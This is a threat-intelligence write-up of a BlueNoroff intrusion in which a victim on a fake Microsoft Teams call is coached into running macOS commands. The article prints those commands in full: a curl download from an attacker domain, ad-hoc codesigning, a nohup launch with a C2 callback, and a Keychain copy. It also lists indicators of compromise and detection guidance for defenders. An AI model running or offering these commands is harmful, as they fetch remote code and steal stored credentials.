BlueNoroff Weaponizes Microsoft Teams Calls to Steal macOS Credentials in Real-Time
Daylight Security has published findings from a real-world intrusion in which BlueNoroff — the financially motivated subgroup of North Korea's Lazarus Group — used live social engineering over Microsoft Teams to compromise a macOS endpoint, steal Keychain credentials, and stage data for exfiltration. The entire attack was operator-driven in real time, with no exploits or traditional malware delivery involved.
The activity aligns with the GhostCall campaign pattern previously attributed to BlueNoroff, in which victims are funneled from messaging platforms into meeting-based lures that enable live command execution and credential theft.
The Attack Chain
The intrusion began on Telegram. The attacker posed as a legitimate business prospect, built rapport, and escalated to a Microsoft Teams call using a lookalike domain — teams.microscall[.]com, registered January 15, 2026.
During the call, the attacker claimed to be experiencing audio issues and coached the victim into opening a terminal and running commands to "fix" the problem. Those commands were the attack.
Payload retrieval. The victim was instructed to download a binary via curl to a path designed to blend in with legitimate macOS system files:
curl -o /Library/Caches/com.apple.sys.receipt https://microsmeet[.]xyz/...Defense evasion. The attacker walked the victim through making the file executable and ad-hoc signing it to reduce macOS execution friction:
chmod 777 /Library/Caches/com.apple.sys.receipt
codesign --force --deep --sign - /Library/Caches/com.apple.sys.receiptPersistent execution. The binary was launched detached via nohup, with output suppressed:
nohup /Library/Caches/com.apple.sys.receipt http://bluyy[.]com/<id> >/dev/null 2>&1 &Secondary components. A second payload masqueraded as an iCloud sync process, and a hidden file was unpacked from a zip archive in /tmp and executed with a C2 callback:
/private/tmp/com.apple.icloud.sync.app/Contents/MacOS/com.apple.icloud.sync 1 1 audio
/private/tmp/.aLTJwk supportzm[.]com:443Credential theft. The attacker copied the victim's Keychain database directly:
cp -rf .../login.keychain-db /tmp/<staging_dir>Data staging. AppleScript (osascript) sequences created directories and bundled stolen files for exfiltration to attacker-controlled infrastructure.
Why This Matters
Every tool used in this intrusion is native to macOS — curl, chmod, codesign, nohup, cp, osascript. There is no malware dropper, no exploit, no phishing link. The human is the delivery mechanism. Each individual action looks benign in isolation. It's the cluster that reveals the compromise.
This is the second distinct Lazarus social engineering campaign targeting developers disclosed today. Red Asgard's Contagious Interview investigation documented industrial-scale credential theft through fake coding interviews, affecting 857 developers across 90 countries. BlueNoroff's GhostCall campaign uses a different vector — live video calls instead of repository-based attacks — but the objective is identical: credentials, wallets, and persistent access.
Detection Guidance
The behavioral chain to alert on is curl writing to system-like cache paths, followed by chmod and ad-hoc codesign on the same file, followed by nohup execution from cache or tmp directories, followed by Keychain database access, followed by osascript-based file staging. Individually these are noise. Together they are compromise.
SOC teams should also monitor for Microsoft Teams connections to domains that are not teams.microsoft.com — particularly recently registered lookalike domains.
Indicators of Compromise
Domains:
bluyy[.]com (Created 2026-01-20)
teams.microscall[.]com (Created 2026-01-15)
microsmeet[.]xyz (Created 2025-11-07)
supportzm[.]com (Created 2025-06-30)IP Addresses:
23.254.130[.]131 (Hostwinds AS54290)
23.254.204[.]184 (Hostwinds AS54290)File Paths:
/Library/Caches/com.apple.sys.receipt
/Library/Caches/com.apple.sys.receipt.cstemp
/private/tmp/.057B0D85-071D-4A43-B4FF-7281027B9B32.zip
/private/tmp/.7fTGPB
/private/tmp/.aLTJwk
/private/tmp/com.apple.icloud.sync.app/Contents/MacOS/com.apple.icloud.syncSHA256 Hashes:
ede7f3ece611ba6c1ac4a02cf6a618b4ebd7eec6d9426b2baab3b5e26246e275
b302be4f9c515eb68d3e8b1ad8388d45b788eca34e7d53726d05c310a8f66af7
18ec3c93e076e16447aee6fa390a44d3cb03e7f46e8466535ee76ed2041a88e5
75a82b9a2e7cfa0002fbbd1dbcb0bfaf5f6333169fd53507f7119593b9c4482e
de664ae9a35ec7f156962df168d876c01c0262fb91486fc25c27859aa9bfe206
e3ed631addd7242e8c1f6faa90087742ff5b442e734132d2fe2594d65659eafdMITRE ATT&CK
T1566.003 — Phishing via Service Initial contact via Telegram, escalation to fake Teams call
T1204.002 — User Execution: Malicious File Victim coached into downloading and executing binary
T1036.005 — Masquerading: Match Legitimate Name or Location Payload written to /Library/Caches/com.apple.sys.receipt, secondary component disguised as com.apple.icloud.sync
T1553.002 — Subvert Trust Controls: Code Signing Ad-hoc codesign applied to malicious binary
T1555.001 — Credentials from Password Stores: Keychain Direct copy of login.keychain-db
T1059.002 — Command and Scripting Interpreter: AppleScript osascript used for data staging
T1071.001 — Application Layer Protocol: Web Protocols C2 communication over HTTP/HTTPS to attacker domains
